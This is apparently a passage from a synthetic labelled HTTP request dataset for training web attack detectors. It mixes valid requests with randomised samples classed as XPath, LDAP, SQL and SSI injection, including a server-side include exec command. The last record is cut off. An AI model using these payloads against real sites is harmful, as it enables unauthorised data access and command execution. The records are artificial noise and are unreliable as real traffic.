----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nhadneatm2faotk=Refob0r5n3ebrii&aHr0amkh4Mei=dsrteeeHay8poA

End - Id: 4286
Start - Id: 12086
class: Valid
GET /W4rc/l5rh0dm7xoECdpGBO/ac@ezFEC_@xEUGLd8t3/ge0n/ehafresstnhy5i5nmA/eFYYyTxii..RE4t/owyxuacceptwp-1Gxmlbody/h7PocSnkmztEOwN2ykg.shtml?araIrhgAsauueie=137&LR6W2.U5httpsselectI=8&wame6fq9ineqaee=btEm2is&sh7eRhshts3=cfo0ji%26hs6e HTTP/1.0
Host: www.aimrHbg.fr:92
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic, cp-936;q=0.2, macintosh, shift_jis
Accept-Encoding: compress;q=0.7, identity, deflate;q=0.9, identity;q=0.7
Accept-Language: oitd-rexwj1gg;q=0.6, w-t6Etn;q=0.3
Cache-Control: yeulno='e'
Client-ip: 229.43.6.180
Cookie: emfiade=38950584;OedTyfee2=hraahesh4
Cookie2: $Version="949"
Date: Sat, 03 Apr 04 12:06:45 CET
ETag: "dXpI4cLssmr0mH-UnG"
Expect: onaNtti6=wymieb
From: k9srctlU@gEhaot2P.gov
If-Modified-Since: Mon, 12 Oct 09 21:41:00 UTC
If-Unmodified-Since: Thu, 01 May 08 19:49:41 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 01 Mar 04 17:03:05 CET
Max-Forwards: 7137
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM cXlncnZpOW9qcmppYTlvdHFvODZiM2Rpcmx5dXR5bWVvbGFndDhhZThybDd2
Authorization: Basic ZWhtYW46bXNhaHNpdHI=
Range: 11450-76
Referer: http://www.atlH.be/xo6ghg/etTnoqj/t9eioBe/btia.aspx
TE: trailers,chunked;q=0.4,chunked;q=0.6
Trailer: Trailer
User-Agent: Mozilla/3.3 (Machintosh; U; Mac OS X 2.8; re-es; rv:7.5.0) Gecko/84569617
UA-CPU: Sparc
UA-Disp: 750,6227,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 802x8230
Via: 1.5 34.155.212.9, 3.3 www.leihn5.htm
Transfer-Encoding: TeCba
Upgrade: agae/3.5, l79so8/7.9, aG6/1.3
Warning: 141 72.168.224.187 "venRvrhuuSnNeznp56h2" 
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 739755
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12086
Start - Id: 49439
class: XPathInjection
GET /lNbx.c3y/bD@ekGMEs/rgtsFDoGPi_/7LvLf/oan7dzaof6iyl/ewmihhEdssu5y1iitoae/.AG.1@scriptHKw.js?g7gra17g1nKts=la&qmOuO4iw=538877807&thi5ce=ev%27%5D++%7C++P++%7C++++%2F%2Fuser%5B++++name%2Ftext%28++%29+%3D+%27eale&sapen0tCooNe0n7=znxsasln&tZ0BKlQQ09=7&otm8G=806708&kwJY@7lib=a2Y&pwgxweinrrca=processing-instructionlo+h&nrcntesqnQa=ncvhhtA&5ssuoOs=6&sioeT=pgz HTTP/1.0
Host: 251.148.80.126
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.1, euc-tw, x-mac-icelandic;q=0.0, x-mac-chinesesimp;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=9
Client-ip: 111.175.169.32
Cookie: eTsRjyOD=Mpassthruhk;amciJn=iEacod coa3xnq 
Cookie2: $Version="59"
Date: Fri, 23 Apr 04 17:56:18 UTC
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: ahceh5y=Ebeurdoc;a1t9sftt
From: poiter@eorm.biz
If-Modified-Since: Tue, 28 Mar 06 19:33:43 UTC
If-Unmodified-Since: Wed, 13 Oct 04 10:46:39 GMT
If-Match: "rpE4w66fU62dXkb21"
If-None-Match: "UW_u@HH5e@YUSHFS"
If-Range: Tue, 12 Apr 05 10:44:51 UTC
Max-Forwards: 64
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM YWVhZXJSbWlwaDlobnJvemNhOWhlMHl0M3RjdHR5UGl1czh4
Authorization: ei93ee ontr=ia8Itr1b
Range: 60-32,32547-,55039-
Referer: /onjme0t/keuuoesn/itati/4iaiHn/79cepi.swf
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/3.5 (compatible; MSIE 1.6; Linux i586; Mok1; t6ao7; tieherse)
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: 6.1 www.tBeai.jpg:22, 1.5 251.35.209.184
Transfer-Encoding: gzip
Upgrade: e0oOd/9.2, ouh2i/3.3, Ncur/2.5
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49439
Start - Id: 12329
class: Valid
GET /iciwita/xagevbmFnOma6rrsft6/ane.asmx? HTTP/1.1
Host: 88.65.60.158
Connection: ieeznh
Accept: */*;q=0.7
Accept-Charset: x-mac-japanese, windows-1252, iso-8859-5, cp-936;q=0.8
Accept-Encoding: compress;q=0.5, identity
Accept-Language: ss-b;q=0.1
Cache-Control: max-stale=4
Client-ip: 120.80.21.176
Cookie: mlLlhXriWauarne=leCw3
Cookie2: $Version="8"
Date: Tue, 11 May 04 15:35:42 GMT
ETag: W/"0v-D@1MPy3dqaZ9lhM"
Expect: 100-continue
From: atRwrmd@teke.it
If-Modified-Since: Sun, 27 Aug 06 03:43:54 GMT
If-Unmodified-Since: Sat, 17 Apr 10 02:36:05 GMT
If-Match: "xREQrVJpjTet3c15MhR"
If-None-Match: "5GPMIc_r1PaVsNx4"
If-Range: Tue, 15 Dec 09 22:07:22 GMT
Max-Forwards: 263
MIME-Version: 2.7
Pragma: asm='3p6a'
Proxy-Authorization: eitfn ddWoshr1=obTeG
Authorization: txyemo tatuKtl=oestjae
Range: 951-7356,4576-927
Referer: http://taeylg.biz/hewesLxl/Snmor/dewiate/nfreTc.tiff
TE: trailers,deflate
Trailer: If-None-Match
User-Agent: Mozilla/4.6 (X11; U; Unix 5.6; Te-ds; rv:7.8.8) Gecko/40698596
UA-CPU: 68000
UA-Disp: 3555,603,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9575x9608
Via: tsi/4.2 www.ereft.html, FTP/3.6 www.hoie.html, 6.3 229.58.205.251:03
Transfer-Encoding: gzip
Upgrade: teoetN/7.2, ieenny/0.9, mcsshe/5.8, Ljw/4.1, lioa6/9.3
Warning: 291 www.sowd.html:096 "ebteyqufs" 
X-Forwarded-For: 105.219.52.42
X-Serial-Number: 7580317
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12329
Start - Id: 34940
class: Valid
PUT /ssNm2f7/ouQaVd1dFehwBKT660wk/iAasBrh/lxg/odtuLwenen/jTMK6mU/kgBlczbzv4LbFg/t5/sf/noR/BY3TphprRDA.asp? HTTP/1.1
Content-Length: 66
Content-Language: ge
Content-Encoding: gzip
Content-Location: http://www.lukndd.gov/Og3rzeny/wndmty/wntistq/Uren5neo.mdb
Content-MD5: b2JkdjFpMGV0bm9ldHVkcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Mar 08 01:44:29 UTC
Last-Modified: Sat, 14 Aug 04 13:46:43 GMT
Host: www.dhci.net
Connection: keep-alive
Accept: application/x-tar;q=0.3, image/*
Accept-Charset: x-mac-chinesesimp, cp-950;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=095
Client-ip: 194.239.97.132
Cookie: Siuhwft96hdten=97973055;uAemshodueA=hepo
Cookie2: $Version="916"
Date: Fri, 07 Dec 07 10:26:41 UTC
ETag: W/"3KoV889aGOUOYMWI"
Expect: gittt0=mpzcmnee
From: renee9@TnweEr.fr
If-Modified-Since: Tue, 05 Dec 06 05:14:54 UTC
If-Unmodified-Since: Sat, 06 Feb 10 03:01:47 CET
If-Match: *
If-None-Match: "xPu7wPmlRmIpTngQi"
If-Range: "xkj1qt4itSPGlB8MB"
Max-Forwards: 0
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM YWxUZ2M3dE5uY25hSG50SGpsc2ZuYXRlbmVmcmVuRWF3dGVBc2hzYjVObTBo
Range: 26302-,-510,4934-
Referer: http://egxtR.ch/ltnihe/4doIre/t3yi/sn1o/hhhrca.js
TE: deflate
Trailer: If-None-Match
User-Agent: Mozilla/8.1 (Machintosh; U; PPC Mac OS X 0.7; aS-s5; rv:7.1.2) Gecko/69189407
UA-CPU: x86
UA-Disp: 7242,197,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 598x266
Via: 2.8 www.lirt8e9.tiff:8760, 1.8 www.h1Hhale.js
Transfer-Encoding: lfee; azintBr=elbse
Upgrade: yeadoo/9.1, ynen/6.6, egnCa/7.9, uis/6.9
Warning: 837 www.kehN6nna.htm "8qpIoylmmte3l" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 755245432377424
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pRoo=E7psra5&mIiSesrH=mstiwoninfrn8dsr&be8ovtsear=xio&ger3yy99=433

End - Id: 34940
Start - Id: 37019
class: LdapInjection
GET /epRoieAAbrtEse7Ilihu/tC8uQ@kP0KRiD2cy4/mw7/7osrd5saiinc8e/Agroup byD0CQ9s/lSE8w_p5OnHyNHT4aKH.php?sIhndoo7=sPNLGjhzV&ocWTo9ntny=1&nnuNtgd8T=ate%29%28%26%28objectClass+%3Dhy8*%29 HTTP/1.1
Host: www.rkateanst.fr
Connection: nfullg
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, deflate, gzip, identity, deflate
Accept-Language: 5REa-sA;q=0.5
Cache-Control: only-if-cached
Client-ip: 96.238.108.221
Cookie: h2Pi@bzgroup by-Mr=rufeoHs;weaba=t5Ltv;b2Dfehtas2sl=o7ume;tnsd7Sht=28520290;rstQ3=t;ipoOn=nseoetfomme
Cookie2: $Version="6"
Date: Wed, 23 Nov 05 01:32:34 CET
ETag: W/"M2xwjae@G8gpcI6el9.Y"
Expect: 100-continue
From: B3nrc@Ecode1.gov
If-Modified-Since: Tue, 24 Aug 04 11:09:51 CET
If-Unmodified-Since: Wed, 15 Apr 09 04:35:42 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Sep 08 16:13:33 CET
Max-Forwards: 61
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: roml abl8p=2srnf
Range: 00177-,0-7679,-82265
Referer: /LTbmh/Ymale7ns/ebOasy.mpeg
TE: chunked;q=0.1
Trailer: Accept-Charset
User-Agent: uSpsisaLe (tRRHOUS8; rEbVvH1r; ex_7hU1Yi; s_bLUfJrLI; wV5JPN1)
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2678x798
Via: 7.7 www.dncf.html, 4.5 www.iy3rs.tiff:20, 3.9 155.57.126.158:412
Transfer-Encoding: tvtacS
Upgrade: ieoez/4.0, enkhu/2.3
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37019
Start - Id: 41476
class: SqlInjection
PUT /tcx3RmvKd3tfXlIP.ZVW/aufecnlh0eta2tW/rDdGOa70m0q/i-i/wp-TXjp0fn8kqUg/sDehbonhaa7selti/atkwW7script@CAQ-Qh9/i3X9bqCMW65Cs7/rLgoH51sJU/hOe4KfDw-dZH5..msf? HTTP/1.1
Content-Length: 147
Content-Language: ma
Content-Encoding: deflate
Content-Location: /i5gr/e2hrtc/Feet.gif
Content-MD5: Y3cyZXFkckk4bHRzaWhubw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Jan 10 11:19:35 UTC
Last-Modified: Sun, 06 Apr 08 16:19:11 GMT
Host: 243.39.41.143
Connection: Wyoe1hey
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: gzip
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 33.190.206.236
Cookie: dluoi4mtghbe8=hrn;Jprocessing-instructionadminNU=maaeewho;dtnAnntofchlrdy=442
Cookie2: $Version="4"
Date: Thu, 04 May 06 01:06:47 CET
ETag: W/"fXwEEo9cRQPW3zV"
Expect: nvcrmt2
From: t0cih@nlhtfemb7.st
If-Modified-Since: Sat, 15 Oct 05 22:40:32 GMT
If-Unmodified-Since: Sun, 13 Jul 08 17:43:47 UTC
If-Match: "iGC_BYX0E1ngwljI"
If-None-Match: "W4g5huuYPxSucrdBruY"
If-Range: Sun, 31 Jul 05 18:27:55 UTC
Max-Forwards: 661
MIME-Version: 4.5
Pragma: ne=taavEa
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: NTLM YWUwYWQ5b2hzbXRkczBqc2dpN3RvcnNsMjU2aXNuZWhMbU5hYw==
Range: 78-403185
Referer: http://if4iEo.gov/cmqu/eea1ritk/hcsab.ace
TE: gzip,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/9.5 (X11; U; Open BSD i386 3.9; tt-tg; rv:2.9.9) Gecko/17227854
UA-CPU: MIPS
UA-Disp: 848,1754,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 054x8213
Via: hib/1.4 www.esnfNof.css:378, 0.3 130.72.79.72
Transfer-Encoding: iiO1y
Upgrade: duea/0.0
Warning: 241 www.cdHIo.gif "n9doishtsina4rYrfe" "Mon, 20 Aug 07 04:06:39 UTC"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fHn-xi='   OR     'ldltsses'   <   'X&vcecni=euegsitt3ii&46c0idkehe0emt=5141466280&lrLlh=376&wgrt2yia=e6nW7Gb&8Bed=75&l1tfhhrop=oahciande

End - Id: 41476
Start - Id: 38250
class: LdapInjection
GET /xqXsPEZa6olTXN1l/hMeIlR0ppHqEm/rk0mrvbce1t5oikpq/upsd/passwdpN5netcatWqIs3/OmrDUTf1U5vx/a_f@52F/rpu/lytaeid/lJYv9cb7bN7Vn/okVy.g.gif?ktnsFtMda=z1&aLwEntdh=pwn%40gilIdelete%27t%2Bc&ynes659n=uDPd3e&enrat3piiaebrm=932217&9irg8aiKycutn=elT&t81F_GLwP=%29++++%28%7C+%28+++cn%3D*o+%27brien*%29%28mail++%3D*o+++%27brien*+%29+++&52hkSseuosssrp=6363 HTTP/1.0
Host: www.tsdheldww.it
Connection: keep-alive
Accept: image/png
Accept-Charset: iso-8859-7, x-mac-turkish, macintosh;q=0.4, windows-1258;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 168.71.61.81
Cookie: twabSkpstetnrc=e&ou
Cookie2: $Version="7"
Date: Tue, 08 Jun 04 22:32:38 GMT
ETag: W/"ZCbAaSPE6CHjWiXUBqL5"
Expect: 100-continue
From: sohsfM@gllyl.be
If-Modified-Since: Thu, 30 Sep 04 23:14:00 UTC
If-Unmodified-Since: Wed, 17 Jan 07 16:22:41 GMT
If-Match: "W7r3reOYUEPzLzC"
If-None-Match: *
If-Range: "Spj01dEzLAZ254.419"
Max-Forwards: 5
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: NTLM cmFubm5kUHViczJsYU9ORUxjYXR4YWduaWFPTHpwdDJuaG5hZHlydGtzc2llOXNS
Range: -465,47-4
Referer: http://www.znylliqu.it/8ihno.ace
TE: trailers,gzip;q=0.0
Trailer: Proxy-Authorization
User-Agent: eiaonsf/1.8
UA-CPU: PowerPC
UA-Disp: 8634,303,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 980x990
Via: 9.2 www.lo6asdq.png
Transfer-Encoding: identity
Upgrade: eddcT/3.3, roas/0.6
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 05796287611
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38250
Start - Id: 49332
class: XPathInjection
GET /flrogcbhjh63oTw/a9/Cwp-or1IzfghhX7PRZ/nIsPrO_loxLxS.cgi?N5XU=i&uothn9j=l3&S8locationCgP-o=601&fr4fiC=symhaeasppnfa&fhdivOelOTwbhavingF=%28eehhsnon&DsalSMrarte=Me%40j+&EentmTmor8Zxml=7609++++or++++diImct%2Ftmn%2F2eo%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D84%5D++or+++++68%3D&Dctt=80595&AZpositionijJSKPbPsystem=eriliphe&xagiha9inh=hvjfG_hw6 HTTP/1.1
Host: 190.112.18.132:96875
Connection: naItaU
Accept: application/x-tar;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.8, compress;q=0.2, deflate, identity;q=0.2
Accept-Language: I-iagwt;q=0.5
Cache-Control: max-age=13
Client-ip: 23.148.126.23
Cookie: ae=0
Cookie2: $Version="94"
Date: Wed, 16 May 07 05:29:02 GMT
ETag: "f-78hbGcyMFOKmfms"
Expect: tpfss
From: 5sny@toesr.uk
If-Modified-Since: Mon, 08 Sep 08 24:30:08 GMT
If-Unmodified-Since: Tue, 01 Aug 06 14:42:06 CET
If-Match: "t822JRwHWPmseRP9"
If-None-Match: *
If-Range: "eY3sf-2Y.5AmHnm"
Max-Forwards: 6537
MIME-Version: 6.3
Pragma: aeo9ae8=apectph
Proxy-Authorization: artrps eibl=2ExpiAa
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: http://socens.de/mggcea/pncwe/rqrtcnia/njbt.jpg
TE: trailers,gzip
Trailer: From
User-Agent: Mozilla/5.6 (X11; U; Unix 5.2; vy-3l; rv:4.2.2) Gecko/98884555
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: FTP/4.4 www.iti1ayd.css, iGdXh/7.0 124.254.183.149:7930
Transfer-Encoding: compress
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 906 www.mgsdP.jpg "luEthgfredan" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 6608359
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49332
Start - Id: 40270
class: SSI
GET /1EGi.1eoDDyf/aJwVOfPC8a/o2jjeeiernydsur/Eeeeaowraiyzss/qvKx9OdqN.sh?wdiv.Zg=saK_Hz3Xiua&it0l=835&Tdiivrceerto=%3C%21--%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5Cifngaadi55%5Csieoannufv%5CT1ds.exe++++d%3A%5Ce7rae8re%5Cwww.laliilra.org%5CwhberAzwn%5Cdatabase.mdb++++%2Fx++++exporttofoxpro%22--%3E&homerPB3HT=hmriugsothee&astedbo2tod0=hewg&hnardT=s+%28GnRCd&hr9oq=whereeets HTTP/1.1
Host: www.uelnnTwsir.net:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: e-pe, isR-end;q=0.5, Tlen-lhe, 2a-Xrp, sitnr-Ss6utaur;q=0.8
Cache-Control: min-fresh=827
Client-ip: 52.223.207.82
Cookie: ioh9cprxe=555447;atr=vrsB9kyi6ijnntt
Cookie2: $Version="29"
Date: Sat, 09 Jun 07 22:19:17 UTC
ETag: W/"PvC@pDiEamK-qycb0"
Expect: 100-continue
From: sinl@n3biht.ch
If-Modified-Since: Thu, 07 Aug 08 10:48:54 UTC
If-Unmodified-Since: Sun, 30 Sep 07 08:43:33 UTC
If-Match: *
If-None-Match: "al9Ci8aqrUkjFeBH"
If-Range: Fri, 24 Aug 07 20:38:47 UTC
Max-Forwards: 58
MIME-Version: 9.5
Pragma: eaqeoD1e='str'
Proxy-Authorization: NTLM Y1RuZWlyYmludGxvb2NhRXpldHNJZ25zYWRNaFdlZUJvZDI=
Authorization: NTLM Y3NlZXNuaXhsaG9pbnJUMnJtYXNkZGVoZm95RUVlQXlpZWFsbXloaDVzZWVkcGE=
Range: 1030-
Referer: /eiBda/ulertto/smire26e/pneik.css
TE: deflate,deflate;q=0.0,deflate
Trailer: Authorization
User-Agent: eZw40zT8. http://www.giKi.fr
UA-CPU: MIPS
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6936x3425
Via: 4.2 181.166.63.46, 7.2 www.ra2n.jpg:50
Transfer-Encoding: identity
Upgrade: zebo/3.9
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40270
Start - Id: 3860
class: Valid
PUT /46oaahfdtopefinSpnze/r9Wvn5CksCe/sma.E4jEb5/1sTtaleibdtwuTcnee.jpeg? HTTP/1.1
Content-Length: 197
Content-Language: occr,moontl
Content-Encoding: compress
Content-Location: http://www.toT2.st/fh6ottgs/blefixlo.mpeg
Content-MD5: aWUzZWVjdWV1aWpvc2lSZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Jun 09 22:06:42 CET
Last-Modified: Thu, 12 May 05 05:08:02 GMT
Host: 118.90.133.243
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: identity;q=0.7, compress;q=0.3, compress, deflate
Accept-Language: *;q=0.4
Cache-Control: gg7lvuhk=assf
Client-ip: 9.95.140.243
Cookie: teNRswixr=o]  dropcopy2Lr;xlj=o3;oyeiiv6i7oeeetc= 8ulogi;Mpdr=n acceptis4ntb-t;nhem=oWj0T;oxs4l=aeIdo
Cookie2: $Version="791"
Date: Thu, 08 Dec 05 20:49:26 GMT
ETag: "iLM2WtRW3iK6QSZeemLw"
Expect: 100-continue
If-Modified-Since: Thu, 13 Sep 07 04:52:18 GMT
If-Unmodified-Since: Tue, 08 Apr 08 02:03:27 GMT
If-Match: *
If-None-Match: "vhekNHuzwdE5xyD"
If-Range: Mon, 15 May 06 05:31:10 GMT
Max-Forwards: 239
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest response="De66272Faccbf0D0AB5EeE7D2E7bBaFa"
Authorization: hode 6etzt=neser81
Range: 37669-,80150-2,4603-7393
Referer: http://qbspa.uk/ijiieq/65toh/wss3D/ce39a/doelvl.rar
TE: trailers,deflate;q=0.9
Trailer: User-Agent
User-Agent: szT_m2K3 http://www.soRoizv.be
UA-OS: WinNT
Via: eyltno/2.9 www.A3npp.jpg:49
Transfer-Encoding: ntti
Warning: 263 www.lavqefa.html "nhe9cew0" 
X-Serial-Number: 4807054029601
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

neol=1ksX34SraL&v1PsR8GFp=cmtbro9eTiixljete&nW86rPiluO=dn ncecwo6mchildncijtecopy=ta&ne=tewindow.open7q &rmujS=ybgsoundoh&xnaonltlsuamiho=ehojeN&hwsibteiond=knRCqoEgrye5pds&sex1hsoe=aisaisofoazhh

End - Id: 3860
Start - Id: 24654
class: Valid
GET /ta5ucecenbi/r8crttZm0ise1/toao4pw3By/keoieaWcsHhyE8Iiu/r_Y@/ajMan4gcebiou/xWq9Y/i3c7oA0A/ckL8kuwT/itrhb5VcnbA.swf?iHps=roT%7Ei%27a&9lbouthy=Ileadg%3BU&ySlrs1ejhuoyt=rasY%7E&oE2klDLfw3=yvgoesleg7eval&nru1tKih=db6+&26j8M=3646668&uaonqm9tS2lEp=Ay&na=1354&eaeTgata=oSkq7QvsZElH&htgsbsdoesne=oNdlSdtaa&Xueihn8Awir3=75 HTTP/1.1
Host: 218.154.90.165:1863
Connection: close
Accept: image/png;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: knw-e0R;q=0.1, i-s;q=0.3
Cache-Control: i=hw8
Client-ip: 0.253.144.213
Cookie: sytEtbuoeas=afs 3caiel;eym8tert=11671;nt2=vuHuo;eeeiyrbouGa=87491012
Cookie2: $Version="83"
Date: Wed, 22 Feb 06 19:52:38 UTC
ETag: "i.7Yq1YoQK.eJPxQ_v"
Expect: vxotTtsu=uteoE;sxh2fs
From: dtiJev@chlmiutOj.fr
If-Modified-Since: Fri, 16 Apr 10 17:29:26 GMT
If-Unmodified-Since: Thu, 27 May 04 11:17:44 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 747
MIME-Version: 3.5
Pragma: Ls='b94eewr'
Proxy-Authorization: Asws oa5d=buerH
Authorization: Digest uri=http://www.gathnS.gov/ai2dt/ea6nOib/seGe/jiiaept.css
Range: 8-2383
Referer: /6cpnnd/teoqht.sh
TE: gzip;q=0.0
Trailer: If-Modified-Since
User-Agent: Qttm (uoU1OHs; lnD5b6; me3mJZWn; a_pk60TbR)
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1205x8135
Via: tgjesn/7.7 www.rtere.jpg, FTP/9.2 www.doono.gif
Transfer-Encoding: identity
Upgrade: erm/1.1, qamkie/3.0, 4Eloit/4.3, e8iif/6.9
Warning: 630 240.228.130.93 "ldhdroewpruS9hem" 
X-Forwarded-For: 97.48.167.87
X-Serial-Number: 56029803010715
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24654
Start - Id: 17380
class: Valid
GET /UsX7caQX7/6iht22ne/h5v/2F5d4/_6QDEeIj--x6likewa/d3BmPoVMvnbw69JfEH.jpg?hbneydirnN=%29ai&qsxgR.nuHVQ3=35274709&8saccess_lognull=lr+eJ&hnafbEe=s%2583i&shngWdenoeney=%40a%40%24ateuduMautoexec0+&ben0dx1O=s-%27eobject%25iYautoexec+em%24h&f4vyDn=aAY&ipb6tnnh2hgeiie=teX9pAkrHo HTTP/1.1
Host: 122.132.253.1
Connection: keep-alive
Accept: audio/x-wav, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sEeeuE-tsYe;q=0.7, tHigs-rKng;q=0.8
Cache-Control: min-fresh=7190
Client-ip: 94.109.158.18
Cookie: n4=9374954;adgero=365;aiw0rneedankDyi=oVfw9dAeOS;izrismetewn=a&
Cookie2: $Version="521"
Date: Mon, 26 Oct 09 14:00:52 UTC
ETag: W/"fa8p4Oe.j@w_d79QRfVn"
Expect: s8ba=blew1r;aetws
From: kvets@sedlb.fr
If-Modified-Since: Thu, 01 Nov 07 16:18:16 CET
If-Unmodified-Since: Tue, 09 Oct 07 09:22:52 UTC
If-Match: *
If-None-Match: "uH1VlLq4p9pVQ1@BtN"
If-Range: Wed, 19 Aug 09 03:41:46 UTC
Max-Forwards: 5000
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic bG9zbmU6dHB1aVNvNA==
Authorization: Digest qop=auth
Range: 98234-2322,3589-76048,8-
Referer: /6withaux/beleis2.php3
TE: trailers,deflate;q=0.5,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: tcGo/9.8.2.7.2
UA-CPU: MIPS
UA-Disp: 436,9131,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 811x940
Via: FTP/4.3 www.3faN.css, FTP/3.9 www.toyC.tiff
Transfer-Encoding: deflate
Upgrade: oes/9.0, emu/6.8, ns1h6u/5.2, axenrt/5.8, sf0ta/2.7
Warning: 796 www.Sr5hr.shtml "jiiinqqlwqitnm" "Tue, 31 Mar 09 02:28:46 CET"
X-Forwarded-For: 53.169.130.69
X-Serial-Number: 534036492924791
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17380
Start - Id: 24878
class: Valid
GET /xrarhc5tIaetre/eumrfIt7htoh9nof/liTbftin/uU8/uB9v6ksbbV/sks1smdcden/i3Wsa/uvAonc4/BSY6HhNbV882d/u_JuW05L4u_a/iU2sinaqnhs/lh3wgiarz.html?an5cum=nrtTLor0efdstcopyw&sWfiIutEt=l8who&ie1aiqro=jr%7Chxp_&hedo=lmtatgnh&f3Ds=3066&Aoereh=unionl2%3Csr+%7Cki6&dehx=232670&inelf=er%3Fpla4Dvbscriptj&6t=ole&RcCAxeX=0a%27ralink%3Di+litf%28swx&@.2sW0L=ga&T3cscEha=%5BoaT6Tmmc&EImtasilcwtjeaa=949621&emtrnnttaB=9svmoe6rfia HTTP/1.0
Host: 83.4.242.184:80
Connection: keep-alive
Accept: text/html
Accept-Charset: x-mac-korean
Accept-Encoding: gzip, compress, identity, identity
Accept-Language: aeiadnh-abocddlo;q=0.2, fes0q-s
Cache-Control: min-fresh=0
Client-ip: 203.244.89.76
Cookie: WJqC_i=2951040;btn4h=9435509
Cookie2: $Version="9"
Date: Sun, 15 Nov 09 13:54:52 GMT
ETag: "qjOAITqA0zF7EvE"
Expect: 100-continue
From: Xn3Re@fshsaAh.de
If-Modified-Since: Mon, 30 Oct 06 24:38:20 UTC
